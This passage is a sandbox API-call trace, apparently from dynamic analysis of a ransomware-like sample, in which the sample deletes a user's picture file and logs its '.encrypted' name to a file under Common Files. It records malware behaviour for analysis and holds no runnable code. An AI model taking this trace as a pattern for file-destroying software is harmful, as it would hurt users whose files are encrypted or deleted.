lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.676] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.676] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.676] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.677] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.677] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\4g9fyjo.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.677] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.678] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.678] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.678] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.679] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.679] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.679] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.679] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.679] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.679] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", lpFilePart=0x0) returned 0x50 [0039.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x175cae80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 0x7c2240 [0039.679] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\4g9fyjo.bmp")) returned 1 [0039.681] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x175cae80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 0 [0039.681] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.681] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.681] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.681] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.681] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.682] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.682] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.682] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.682] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.682] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.682] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.682] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.682] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.682] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.683] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.683] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x29e2, lpOverlapped=0x0) returned 1 [0039.683] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.683] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x29e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.683] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.encrypted.bmp\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5d) returned 0x87a9d8 [0039.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.encrypted.bmp\r\n", cchWideChar=93, lpMultiByteStr=0x87a9d8, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 93 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0039.683] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5c, lpOverlapped=0x0) returned 1 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0039.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.683] CloseHandle (hObject=0x128) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.685] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.685] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.686] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.686] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.686] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.686] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | 